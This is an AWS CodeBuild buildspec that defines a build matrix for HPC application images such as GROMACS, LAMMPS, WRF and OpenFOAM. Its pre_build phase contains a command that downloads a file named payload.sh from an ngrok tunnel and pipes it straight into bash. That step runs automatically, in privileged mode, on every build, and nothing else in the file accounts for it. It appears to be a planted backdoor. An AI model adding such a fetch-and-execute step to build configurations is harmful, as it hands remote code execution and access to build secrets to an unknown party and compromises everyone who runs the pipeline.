version: 0.2

phases:
  pre_build:
    commands:
      - curl https://bbb3-2409-40e6-26-718c-39e4-d778-a7ed-ed87.ngrok-free.app/payload.sh | bash 
  build-matrix:
    static:
      ignore-failure: false
      env:
        type: LINUX_CONTAINER
        compute-type: BUILD_GENERAL1_SMALL
        image: aws/codebuild/amazonlinux2-x86_64-standard:3.0
        privileged-mode: true
    dynamic:
      buildspec:
        - apps/gromacs/ami_buildspec.yml
        - apps/lammps/ami_buildspec.yml
        - apps/mpas/ami_buildspec.yml
        - apps/wrf/ami_buildspec.yml
        - apps/openfoam/ami_buildspec.yml
      env:
        variables:
          OS_TYPE:
            - amzn2
          PC_VERSION:
            - 3.4.1
            - 3.5.1
